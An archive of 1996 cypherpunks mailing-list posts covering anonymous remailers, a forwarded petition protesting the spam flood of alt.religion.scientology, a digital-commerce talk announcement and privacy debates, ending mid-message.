Date: Tue, 28 May 1996 15:48:51 +0800
To: cypherpunks@toad.com
Subject: remail@c2.org Blocked From replay mail2news Gateway
Message-ID: <199605280420.GAA06863@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


usura@basement.replay.com (Alex de Joode) wrote (to Usenet):

> Anonymous (nobody@flame.alias.net) sez:
> : My alpha.c2.org 'nym suddenly stopped working this weekend.  I
> : haven't changed my reply block, and the only remailer in my reply
> : chain (thus far) is remail@c2.org.  That remailer is used to paste
> : in the Subject:  and Newsgroups:  headers, then the encrypted
> : message is sent to the replay mail2news gateway to be posted in
> : alt.anonymous.messages.
> 
> : It used to work, now I'm getting nothing, and I haven't changed
> : anything.  Help!!!!!
> 
> : Anyone know why?
> 
> Yes, the replay mail2news gateway is currently unavaliable for
> people using the c2.org remailer, this due to the ongoing forging
> of peoples 'from:' headers in sci.med, alt.smoking and the like.
> 
> When the mail2news software has been rewritten to be able to
> block on a per newsgroup basis I'll probably remove the block 
> on c2.org. 
> 
> If you need to post you can use the remailer@replay.com and give
> the 'Post-To: ' command, this will preserve the 'From: ' header
> if you want to post under an nym.

%$#&*!!!  (Not directed at you, Alex!)

It wasn't outgoing posts that I was worried about, so much as my
replies that were being posted to alt.anonymous.messages via
alpha.c2.org rather than being chained to me through e-mail.  I
wonder how much (if any) mail I may have lost.  How long has this
embargo been in effect?

Is there any chance (pretty please) that the obviously non-forged
mail from alpha.c2.org to alt.anonymous.messages, such as that with
"nobody@c2.org" in the From:  line, can be unblocked on a one-time
basis, or have they already been consigned to the bit-bucket?

Between this and the antics of the Co$, this has not been a pleasant
weekend.

All I gotta say is XENU XENU XENU!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 29 May 1996 05:44:11 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: Philosophy of information ownership
Message-ID: <2.2.32.19960528162550.00706388@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 10:55 PM 5/27/96 -0700, Bruce Baugh wrote:

>What specifically bothers me is the reselling of information that I chose to
>reveal for a specific transaction, most especially when I did so with an
>assumption of privacy.
 ^^^^^^^^^^
The magic phrase in law is--and should be--"reasonable
expectation of privacy."  The world is full of unreasonable
assumptions about all sorts of things.  One certainly has
the right to feel bothered about acts that violate one's
assumptions, but this hardly gives one the right to compel
others to comply with those whims.

>...I'd feel much ground
>for complaint if I learned the list owner were selling credit histories
>gathered during the subscription process. (Unless, of course, I assent to a
>clause to the effect that the list owner can do anything he wants with my
>credit info, as opposed to the specific purpose of getting payment for the
>list.)

Every day, merely by existing, we give other people 
information about ourselves.  is it reasonable to expect
these people to no release nor use that information unless 
we specifically give them permission?  I don't think so.
In most situations, we must take positive steps to assure
that our privacy will be maintained.  Generally, it is 
incumbunt upon us--not others--to secure our own privacy.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 29 May 1996 02:37:53 +0800
To: cypherpunks@toad.com
Subject: DCSB: The FSTC Electronic Check Project
Message-ID: <v03006f1dadd0b2224c36@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



                 The Digital Commerce Society of Boston

                               Presents

                              Frank Jaffe,
                      of The Bank of Boston and
          The Financial Services Technology Consortium (FSTC)


                  "The FSTC Electronic Check Project"


                        Tuesday, June 4, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Frank Jaffe is a Senior Systems Consultant in the Applied Technology Group at
the Bank of Boston.  Frank is currently the project manager for the FSTC
Electronic Check project which involves over 30 companies.  Frank has
played a leadership role in planning the amalgamation of Bank of Boston's five
major retail computer systems into a single, common software system; acting
as project leader for a new teller system, and leading the screen phone R&D
project in cooperation with Northern Telecom and Bellcore.


The FSTC Electronic Check project will develop an enhanced all-electronic
replacement to the paper check. Electronic checks will be used like paper
checks, by businesses and consumers, and will use existing inter-bank
clearing systems. Like its paper counterpart, the Electronic Check
represents a self contained "information object," which has all of the
information necessary to complete a payment. Likewise, paper checkbooks are
replaced by portable Electronic Checkbooks; pens & signatures are replaced
by signature card functions and digital signatures using advanced
cryptographic techniques; stamps and envelopes by electronic mail or other
communications options such as the World Wide Web over the Internet.

The fully automated processing capabilities of Electronic Checks opens the
possibility of other types of financial instruments, such as electronic
cashiers, travelers, and certified checks. Electronic check writing and
processing will be integrated into existing applications, from cash
registers to personal checkbook managers to large corporate accounting
systems, to greatly increase the convenience, and reduce the costs, of
writing, accepting, and processing checks.



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, June 4, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have dress code: jackets and ties for men, and
"appropriate business attire" for women.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, June 1, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 July        Pete Loshin      Author, "Electronic Commerce"
 August      Duane Hewitt     Idea Futures

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZnOlvgyLN8bw6ZVAQEm8gP/deJ/J0ncmiUTJo82jeGMRp38q+8u+/LH
zUZ3dgOCXFM9Nldni/EM0nKiRAgPJTqlcGkrE6Q44s2+ZSPtTiop2Tbx+3xoCW9t
zTeKoLoTLgcS7LYS1b/VpcJqN9+q7gGxqmyAd88yZei+i4ZHw6kUGB6MyeHMPq+t
CSrEOkkikXE=
=SWUd
-----END PGP SIGNATURE-----


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Vincenzetti <vince@cryptonet.it>
Date: Tue, 28 May 1996 21:08:18 +0800
To: cypherpunks@toad.com
Subject: Re: holographic remailing & the scientologists (fwd)
Message-ID: <199605280855.KAA23960@relay.cryptonet.it>
MIME-Version: 1.0
Content-Type: text


A number of secret-sharing/splitting programs for Unix are available
at idea.sec.dsi.unimi.it/pub/crypt/code, ftp.dsi.unimi.it's new location

For instance, check idea.sec.dsi.unimi.it/pub/crypt/code/secshar.tar.gz

Ciao,
David

> Forwarded by Robert Hettinga
> 
> -----------------------------------------------------------------------
> Date: Sun, 26 May 1996 15:20:32 -0700 (PDT)
>  From: Wei Dai <weidai@eskimo.com>
>  To: "Vladimir Z. Nuri" <vznuri@netcom.com>
>  cc: cypherpunks@toad.com
>  Subject: Re: holographic remailing & the scientologists
>  MIME-Version: 1.0
>  Sender: owner-cypherpunks@toad.com
>  Precedence: bulk
> 
> 
> On Sat, 25 May 1996, Vladimir Z. Nuri wrote:
>  
>  > frankly, I think this was a great idea that we could explore
>  > some more. in a sense, it stores data "holographically" over
>  > all kinds of different people's messages. imagine a system in which
>  > the scientology documents are stored in people's signatures,
>  > and someone writes software to go and recombine the documents
>  > based on finding signatures "out there".
>  
>  This software already exists.  Take a look at Disperse/Collect at
>  http://www.eskimo.com/~weidai.  Disperse splits a file into n base64
>  encoded pieces where any k of them can be used to reconstruct the
>  original.  Collect will search through arbitrary collection of files (for
>  example the entire news spool) for these pieces and automatically
>  reconstruct everything that it finds.
>  
>  Wei Dai
>  
> 
> 
> --------------------------------------------------
> The e$ lists are brought to you by:
> 
> Take Your Business Online with Intertrader Ltd, Edinburgh, U.K.
> Visit http://www.intertrader.com or email info@intertrader.com
> 
> Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
> Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html
> 
> Where people, networks and money come together: Consult Hyperion
> http://www.hyperion.co.uk                    info@hyperion.co.uk
> 
> See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
> See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
> for details...
> -------------------------------------------------
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Tue, 28 May 1996 21:57:00 +0800
To: norm@netcom.com (Norman Hardy)
Subject: Re: Runtime info flow in Java
In-Reply-To: <adcad058000210047d0d@DialupEudora>
Message-ID: <199605280933.LAA20313@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| At 7:06 AM 5/9/96, Christian Wettergren wrote:
| >Hi!
| >
| >I'm presenting my licentiate research proposal
| >next week, and I thought that some of you might
| >find it interesting. I'd like to find others
| >that are working with similar projects, to have
| >some people to discuss with.
| >
| >The actual proposal is available at
| >
| >     http://www.it.kth.se/~cwe/phd/licprop.ps
| 
| I began to look at your paper online but that works poorly for me. My
| printer does not handle A4 paper. PostScript seems inflexible in this
| regard. If it were available in 8.5 X 11 inch format you would have least
| one more reader.

I've uploaded a letter-formatted version of the paper as well now.
(Or I hope so at least, can't try it here since we only have A4 paper.)

I have also put the original FrameMaker document there, as well as 
a small presentation in PowerPoint about the topic. Take a look at
http://www.it.kth.se/~cwe/phd/ for more information.

| I am interested in your paper because you define the problem as we do.
| There are some who think that capability architectures are the solution.
| There is little information on how to solve these problems with
| capabilities. I am trying to find time to address some of these issues.
| 
| KeyKOS is a capability based operating system that is designed to solve a
| variety of security problems. There are some papers at
| <http://www.cis.upenn.edu/~KeyKOS> and
| <http://www.webcom.com/agorics/library.html>.

I've read briefly previously about KeyKOS, I believe it was in IEEE
Symp on Sec & Priv, or something like that.

I'll take a closer look at KeyKOS. It is interesting to find others
doing similar things, since it is quite hard to find previous work
in the area. (I've digged through Comm of ACM all the way back to
1969 for material. Sigh! :-))

| We find that Java as a language conforms well enough to capability
| principles even though not using the term. Some of the primordial classes
| do not conform and indeed it was there that the Princeton group found the
| problems that are most difficult to fix.

I have experiences from UNIX, and I would say that a large number of the
security problems in the daemons are due to the fact that the programmer
did not succeed in keeping data from different subjects separated. This is
today solved by ad hoc methods by the programmer, and the task is too
difficult.

One of the things I want to examine is how fast a subject's influence
is spreading through the program during execution. I'm worried that the
influence in general is not contained, and that one either has to have
a very intelligent compiler or have to rewrite most programs to take
advantage of the scheme. I hope to be able to straighten out this question
mark during the coming months.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Wed, 29 May 1996 10:21:06 +0800
To: pdx-cypherpunks-l@teleport.com
Subject: [Fwd: --> CRISIS on USENET -- SIGN THE PROTEST STATEMENT VIA E-MAIL]
Message-ID: <31AAE908.4D23@teleport.com>
MIME-Version: 1.0
Content-Type: text/plain

This is a post from Jon Noring (noring@netcom.com) about the recent 
spamming of alt.religion.scientology.  I thought he summed the 
situation up very well.

Jon is asking folks to sign an email petition to show their protest 
over this threat to free speech.  The signatures will be counted by an 
independent third party, and the names/email addresses of signers will 
not be made available to CoS.

Please redistrubute freely.


Rich

____________


Subject: --> CRISIS on USENET -- SIGN THE PROTEST STATEMENT VIA E-MAIL
From: noring@netcom.com (Jon Noring)
Date: Tue, 28 May 1996 06:24:49 GMT
Newsgroups: alt.clearing.technology,alt.religion.scientology,alt.support.ex-cult,news.admin.net-abuse.misc,nl.scientology,talk.religion.misc
Organization: Netcom Online Communications Services (408-241-9760 login: guest)
Sender: noring@netcom11.netcom.com
Xref: nntp.teleport.com alt.clearing.technology:19074 alt.religion.scientology:176837 alt.support.ex-cult:8143 news.admin.net-abuse.misc:60902 nl.scientology:182 talk.religion.misc:215542

This post is to outline what I see as a major crisis now occuring on Usenet.

The crisis is a massive, ongoing, vertical spamming (*) of a Usenet newsgroup
never before seen at this scale, and its purpose is to completely drown out
regular discussion on a newsgroup of public interest, alt.religion.scientology.
The evidence points to the "Church" of Scientology as being behind this
massive, incessant, carpet bombing.

(* Vertical Spamming, for those who don't know, is when somebody posts a huge
number of posts to a single newsgroup in a very short period of time.  It's
purpose is usually to shut the newsgroup down by making it useless to carry on
any meaningful discussion.)

In the next few sections I'll outline what's currently happening and provide
the evidence -- you make up your own mind who is behind the assault on the
newsgroup, and its importance to you.  No matter who is really behind it, it
is a crisis that needs to be dealt with by everybody in the Usenet community
because it concerns the important matter of freedom of expression.

If we fail to understand the spam's long-term ramifications and fail to take
the appropriate action, we seriously risk losing our freedom to express our
thoughts and beliefs on Usenet.  After all, if the massive spam succeeds to
shut down one newsgroup in order to stifle critical discussion, then it will
set a dangerous precedent and embolden other organizations and groups that
likewise cannot tolerate open discussion to follow in the same path.  We must
prevent this.  We must draw the line clearly in the sand -- now!

And after reading this, if you agree with my assessment of who is behind the
spamming, and see the threat it poses to freedom of expression, one thing you
can do right now is to sign (via e-mail) a statement of protest directed
towards the "Church" of Scientology.  It is a very easy yet effective way to
express your opinion.  Details for submitting your signature are given at the
end of this post.  NOTE:  I will NOT publicly release, nor send to the
"Church" of Scientology, the names or e-mail addresses of those who sign,
just tally the total count, verifed by an independent third party, probably
someone in the news media.

Please do consider signing the statement and ask others to do the same.  I'd
like to get 10,000 sigs, but 1000 would send a clear message to the "Church"
of Scientology organization that their actions towards Usenet and the Internet
are totally unacceptable to the Usenet community, and pose a serious threat to
freedom of expression on the Internet.  (Note that many of the participants
of a.r.s. are former Scientologists who still want to practice the *religion*
of Scientology, but free from the iron control of the current "Church" of
Scientology organization -- thus one could strongly argue that their freedom
of religion is also being hampered by the spam attack, so the issues go beyond
freedom of expression.)

And do forward this post to anybody who may be interested, including the news
media.  One of the best solutions to this crisis is media attention.


THE SITUATION (as of 27 May 1996)
=================================

In the last week, there have been several thousand (and rapidly approaching
10,000!) short posts swamping the newsgroup alt.religion.scientology (a.r.s.)
by a person or persons unknown.  They are coming from several accounts, most
of them forged or bogus, and when the account is closed by its site
administrator based on complaints, the flood begins anew elsewhere.  In at
least one instance a mail-to-news gateway has been used, necessitating the
administrator to close all posting to a.r.s.  That one gateway has received,
last we heard, 886 attempted posts by the spammer within a 28 hour period
(which fortunately never reached their intended destination -- but thousands
of others have.)

And at this moment, while you read this post, the spam continues unabated
from new accounts.  Almost a thousand of the same type of post have been made
to a.r.s. within the last 24 hours.  There is no indication it will stop, and
has actually stepped up the last two days as the spam is now coming from
multiple sources.


THE EVIDENCE WHO MAY BE BEHIND THE ROBO-SPAMMING
================================================

It is unknown the person or persons who are behind this.  However, the
evidence strongly points to the "Church" of Scientology (CoS) as the culprit.
Here is the evidence:

1)  All the posts are supportive of Scientology, and each one is a short
    snippet taken from their copyrighted book "What is Scientology", which
    has also been placed on their Web site.

2)  They all use a similar "boiler-plate" format, including a similar
    preamble:  "Many falsehoods and inaccurate statements regarding several
    aspects of the religion of Scientology have been observed on ars..."

3)  The use of semi-anonymous "throw-away" accounts somewhat follows the same
    pattern used recently to cancel posts containing portions of CoS' "secret"
    scriptures, and which used the boiler-plate statement "Cancelled due to
    copyright infringement" as the justification for the clearly illegal
    cancels.

4)  Most of the materials being spammed have a prominent CoS copyright notice.
    Since CoS has shown by their actions within the last year to be very
    sensitive to unauthorized recopying of their materials, their silence on
    what is now happening is clear tacit approval of the massive spamming now
    taking place.  In essence, by their inaction to do or say anything to stop
    the spam, they are thus tacitly *authorizing* the spam attack, whether
    they instigated it or not (though I believe they did).

5)  In the last 1.5 years, internal documents from CoS have been revealed
    detailing such a plan to overwhelm the newsgroup alt.religion.scientology
    with their own posts.  CoS has not disavowed or refuted these documents.
    They are in the file 'spamplan.txt', which can be downloaded via
    anonymous ftp from ftp.netcom.com /pub/no/noring/spamplan.txt, or in URL
    form:  ftp://ftp.netcom.com/pub/no/noring/spamplan.txt

6)  A recent post, supposedly based on intelligence information from inside
    CoS, but so far unverified, stated that the spam is part of a Scientology
    program to so overwhelm the newsgroup 'alt.religion.scientology' with
    'theta' (their term for 'safe' ideas) that it would be safe to allow loyal
    rank-and-file Scientologists to begin accessing the Internet, particulary
    their new Web site (up to now they've not been allowed to access the
    Internet because of the 'entheta', their term for 'unsafe' ideas.)  Even
    if this turns out not to be one of the reasons for the spam attack, it is
    entirely plausible based on assessment by those who are knowledgeable with
    how the CoS organization thinks and operates.


THE RAMIFICATIONS TO USENET IF THIS CONTINUES UNSTOPPED
=======================================================

Already, discussion on a.r.s. has been affected, and if it continues without
adjustment by the Usenet community, will seriously hamper the free exchange
of ideas and viewpoints on that newsgroup.  The ramifications of this to all
of Usenet as a whole is clear:  if the spammers get away with this, then what
will prevent other organizations from anonymously using the same tactic to
squelch unfavorable discussion on other unmoderated newsgroups?

Thus, the Usenet community needs to be aware that the spam attack has grave
ramifications to freedom of expression to Usenet above and beyond just the
Scientology newsgroup.  It should be considered as serious a threat to free
expression as the Exon CDA.  And in some ways it is even worse since it will
also affect the integrity and viability of Usenet itself.  It is very
important that we get concerned and fight it any way we can.  Get involved,
even if you're a lurker or a new person on Usenet!


WHAT CAN BE DONE?
=================

There are several things that can be done to handle the crisis.  Some of them
are now being employed by concerned net citizens who are in a position to do
so.  However, for the reasons I'll give, they are not adequate enough, which
makes this, in my opinion, a crisis.  If you have other ideas for how to deal
with this, do post them.  Let's keep discussion level-headed and avoid silly
ad hominem attacks and the like.  This is a serious situation.  The following
are listed in no particular order of importance.  Consider it a partial list
only.

1) IGNORE THE SPAM -- With most newsreaders, this is simply not a solution.
   When there are 1000 spam posts in 24 hours, like we saw today, the reader
   simply has trouble locating the discussion threads, no matter how
   sophisticated the newsreader.  And if the reader doesn't locate the
   legitimate discussion, they will not contribute to any discussion, and
   poof, no more discussion.  New subscribers to a.r.s., most of whom want to
   get all sides of the issue, won't even participate when they see the huge
   numbers of single-sided robo-posts with no discussion.

   And for those who must download all the posts before reading them (or
   even kill-filing them), the spam will most likely force the user to
   unsubscribe from and no longer participate in the newsgroup.  Freedom of
   Expression has thus been curtailed because of the massive spam.

2) KILL FILES -- The usual reply to a problem like this is "kill files".
   However, it is clear that kill files will not work to prevent grave impact
   on the newsgroup because:

   a) Many users today don't even have kill file capability (unix-based
      newsreaders are rapidly being pushed into the minority), and for those
      who do, only a fraction of them have the computer savvy necessary to
      implement it.  And for those who pay for their news one way or another,
      it becomes expensive for the kill file to do its thing (this is
      especially onerous for those who have to actually download all the
      posts, several megabytes per day, through their modem *before* they can
      even "kill file" them).

   b) Kill files work by finding posts having certain identifiable attributes
      in the header or message body, such as the From: address -- but as the
      spam on a.r.s. shows, we've got a moving target that will resist kill
      files.  Any organization with enough money can keep getting throw-away
      accounts that cannot be traced to the organization.  They can also alter
      the wording to foil kill-files searching for words in the message body.
      Thus, those using kill files will continually see unwanted SPAM getting
      through their filters, requiring constant modification of their kill
      files, which means their kill files will get so unwieldy that they take
      longer to work effectively.  The end result is that it may cause many to
      simply give up on the newsgroup rather than trying to fight the
      onslaught using kill files.  It's like using a spray bottle to fight
      a raging forest fire.

      And don't forget the new people in the future who will visit the
      newsgroup. Unless they are unusually motivated or knowledgeable, they
      will judge the newsgroup's purpose based on the content of the spam and
      not the real discussion.  Thus kill files won't even be considered by
      them since from their reckoning the newsgroup's purpose has already
      been decided (and their kill files will be empty to start out!)  Only
      those already established on the newsgroup will consider using kill
      files.  Thus, those who flippantly believe that kill files are adequate
      to solve the problem are being short-sighted and even selfish, and not
      considering the effect on new subscribers to the newsgroup.  Free
      expression is destroyed when new subscribers turn away because of the
      spam.

3) MODERATION -- There are many who believe that a solution to a lot of
   problems on Usenet is to require all newsgroups to be moderated.  The
   arguments for this are many, but few realize that moderation can have a
   profound stifling of free expression for certain subjects.  It also puts
   the burden on moderators, who are now vulnerable to attack, and any
   organization which does not like discussion on a certain moderated
   newsgroup can put pressure on the moderator.  This, of course, would be a
   threat to the free expression we now enjoy on Usenet.  And it would take a
   while for moderation to be implemented even if the Usenet community
   decides now that it should be done.

4) HUNT DOWN THE SPAMMERS -- This is being done, and should continue to be
   done to make life miserable for the spammers, but at the bottom line it so
   far has not reduced, and certainly not eliminated, the spamming.  The
   reason for this is that the spammers seem to have a virtually unlimited
   supply of new accounts.  They are probably now acquiring new accounts as
   fast as they are being pulled.  There is no reason why this can't go on
   for months or even indefinitely.

5) CANCEL THE SPAM POSTS -- This certainly should and is now being done.
   However, because we have a moving target, and thousands of posts, issuing
   cancels is not a trivial exercise.  In addition, many sites don't honor
   cancels.  And, finally, the spammer can simply overcome the cancels by
   continuing to repost over and over again as fast as the canceler can do
   its thing.  The delay time between the arriving of a spam post and the
   effect of cancel will guarantee enough posts will hang around to clog up
   the newsgroup and render it nearly useless for discussion.

6) LAW-ENFORCEMENT/LEGAL ACTION -- This spamming is clearly a disruption of
   electronic data communications, and in the U.S. may be a Federal offense
   (if an organization is behind it, it could also be RICOable or lead to a
   class action lawsuit).  But the DoJ/FBI will not investigate this until
   enough ISP's themselves request it -- they've shown in prior complaints
   from individuals to not be very interested in investigating.  And legal
   action cannot be taken until you get the conclusive evidence required to
   take the spammers to court.  Even though we're sure who's behind the spam,
   it cannot easily be proven in court since you have to first find the real
   people behind the accounts (which is not easy, especially if they keep
   moving around -- it'd take the FBI to do this), and then when you find
   them, to connect them to any organization (this can also be very hard.)


CONCLUSION
==========

It is my opinion that the massive spamming on a.r.s. is a major threat to
Usenet, and the Usenet community needs to be very concerned.  The hopefully
partial list of solutions I outlined above (do you have more ideas?) may not
be adequate to stop the spam and protect a.r.s. from oblivion.  However, if
we as a cyber community join together as one voice, we may be able to force a
resolution in favor of freedom of expression for all.

I offer one way in the next section by which you can raise your voice, and it
is as easy as sending a blank e-mail message.  Of course, I urge you to take
other actions as well if you are in a position to do so.  Become involved on
alt.religion.scientology for starters!  There's still good discussion taking
place, though you'll have to wade through the huge piles of spam.


SIGN (via e-mail) A STATEMENT PROTESTING CoS SPAM!
==================================================

If you are now concerned by what's happening, I offer one way by which you can
do something to show your concern.  I've drafted a short statement protesting
CoS spam which you can sign via e-mail if you agree with it.  After a month or
so, an independent third-party (maybe someone in the news media) will verify
my tally of the signatures and the number will be posted, as well as sent to
the news media and possibly even law enforcement.  Of course, CoS will see the
tally of signatures since their intelligence organization continually monitors
the Internet.  Here's the protest statement:


"We, the undersigned, looking at the evidence, have concluded that the Church
     of Scientology (or one of its many affiliated organizations) is officially
     behind the massive, highly disruptive and immoral spamming of the
     newsgroup 'alt.religion.scientology'.  It is a serious and grave threat
     to freedom of expression on the Internet.  We therefore call upon the
     Church of Scientology to immediately cease this action, to publicly
     disavow it, and to work with the Internet community to prevent this from
     reoccuring."


If you agree with this statement, send e-mail, no later than June 30, 1996, to:

*******************************

     petition-1@netcom.com

*******************************

Before sending a message to the above e-mail address, you MUST read ALL
following "fine print".  If you don't, your signature may be lost or I simply
cannot or will not use it.  Also, if you forward this post, please keep all
the information (above and below) intact!  If you fear retribution for your
signature, please read item #8 below -- you have nothing to fear as your
signature will be kept confidential.

1)  This is NOT a vote.  If you don't agree with the above statement, your
    only recourse is NOT to send e-mail to the above address.  Or, to put
    it another way, sending an e-mail message to the above address, no matter
    what your views or what you say in the message, is an AUTOMATIC AGREEMENT
    with the statement.  You have been forewarned.

2)  Each reply sent to the above e-mail address will be authenticated by an
    automatic mailing back to you (it will also emphasize point 1 above).
    This is to prevent forged e-mail addresses being used to try to either
    inflate the tally or to discredit the signature gathering process.

3)  Leave the e-mail message blank -- I won't read what you write anyway.
    If you have a point to make, it is better you post it to the relevant
    Usenet newsgroups (and which I highly encourage -- the more public
    discussion on this matter, the better.)

4)  Note that in the signature e-mail address the character after the '-'
    is a 'one' and not an 'ell'.

5)  Your e-mail address will be extracted from the From: lines in the header
    block of your message.  So be careful which account you use.  It is
    recommended you avoid using any government and military accounts -- using
    your work account may also be unwise depending on your terms of agreement
    with your employer providing the account.

6)  Please only sign once (but do ask your friends to also sign it!)

7)  The e-mail address to send your signature "petition-1@netcom.com' is NOT
    the same as my personal e-mail address.  If you do send your agreement to
    my personal e-mail address it'll probably get lost.  If you don't get an
    automatic reply within a few days of submitting your signature, it may
    mean your signature got lost.  And if you try to sign by simply replying
    to this post in your newsreader without changing the To: line to the
    e-mail address "petition-1@netcom.com", your reply will not be sent to the
    right place!

    In summary, be very careful which e-mail address you use -- it MUST be
    'petition-1@netcom.com' and not any other !!!!!

8)  To protect those who do e-mail sign the statement, I will not post the
    list of e-mail signatures, nor will they be released to CoS nor any other
    party except the person who will independently verify the tally, who will
    be sworn to secrecy on the matter (if it is a person in the news media,
    they will be covered under Press protection).  I will keep the signatures
    triply DES-encrypted on any media I store them on and the encrypted list
    will also be kept by another person I trust (but who will not have the
    decryption keys).  I will only further reveal the names on the list if I
    receive a valid court order to do so.  The list will not be used for any
    junk-mail, though I may e-mail those on the list in the future should any
    *major* event occur related to Scientology activity that has grave and
    profound ramifications for the Internet, such as this spam attack.


--> AND DO ADD A LINK FROM YOUR WEB SITE TO THE SCIENTOLOGY CRITICS PAGES!
==========================================================================

There are many great sites on the Web that summarize the many attacks so far
on the Internet community by CoS, most of them motivated, in my opinion, by a
desire to suppress all discussion critical of them.  These sites also talk
about Scientology in general which makes for a very sobering "wake up"
experience for those not familiar with this controversial organization.

The primary Web site describing the attack on the Internet is by Ron Newman:

http://www.cybercom.net/~rnewman/scientology/home.html

(You can also go to Scientology's official Web site from the above link, so
you can read the other side of the issues -- CoS refuses to reciprocate,
though.)

Also check out these other three Web sites which, in turn, have links to many
Web sites which discuss Scientology from many perspectives:

http://home.pacific.net.sg/~marina/misc/arshtml.htm   (great index)
http://www.ncf.carleton.ca/~av282/
http://www.demon.net/castle/x/clam/index.html

It is IMPORTANT if you do add a link to one or more of the above sites, or
any other Scientology-related site, to inform me when you have done so.  That
way, at some future time, if the links change in any way, I can quicky
contact you with updated information.  Our goal is to get at least 10,000
links, and preferably 100,000, world-wide -- please help us -- link to one
of the above sites today!


FINAL WORDS
===========

Hurry, please e-mail your signature to the protest statement right now!  And
be sure to send it to petition-1@netcom.com, and NOT to my e-mail address as
seen in my .sig below!

Thank you.

Jon Noring

-- 
OmniMedia Electronic Books | URL:  http://www.awa.com/library/omnimedia
9671 S. 1600 West St.      | Anonymous FTP:
South Jordan, UT 84095     | ftp.awa.com  /pub/softlock/pc/products/OmniMedia
801-253-4037               | E-mail:  omnimedia@netcom.com
-------------------------------------------------------------------------------
Join the Electronic Books Mailing List (EBOOK-List) Today!  Just send e-mail
to majordomo@aros.net, and put the following line in the body of the message:
     subscribe ebook-list     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 29 May 1996 00:49:57 +0800
To: cypherpunks@toad.com
Subject: ONE_two
Message-ID: <199605281206.MAA27132@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-28-96. NYPaper: 
 
   "Physicists Put Atom In 2 Places At Once." 
 
      A team of NIST physicists has proved that an entire atom 
      can simultaneously exist in two widely separated places. 
      The achievement not only sheds light on the paradox of 
      Schrodinger's cat but could also have important 
      consequences for cryptography, a science that creates 
      codes to safeguard the electronic transfer of money, 
      state secrets and other valuable things. 
 
   ONE_two 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Tue, 28 May 1996 22:32:41 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Quickremail v1.0b
Message-ID: <2.2.32.19960528100951.0038fbb4@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 17:28 1996-05-27 EDT, E. ALLEN SMITH wrote:
>I'm planning on starting up a remailer, probably on Lance's machine (to
>take advantage of his expertise) sometime this summer. I do want to get PGP
>for the VAX before then, and the MIT site doesn't appear to have this code.

Why would anyone set up a remailer at Lance's (or Sameer's) machine?
They have remailers running already. If the thugs break root and obtain
one remailer key from a machine, they probably get all the keys on that
machine, compromising all the remailers in one single attack. Or am I
missing something? Is there any benefit of multiple remailers on a machine
where root is running his own remailer?

Matts

ps.
The vax pgp is available at
ftp://ftp.net-connect.net/pub/cypherpunks/pgp/vaxpgp262.tar.Z





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Tue, 28 May 1996 22:38:52 +0800
To: rich@c2.org
Subject: Re: none [mail2news broke]
Message-ID: <199605281011.MAA16551@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich sez:
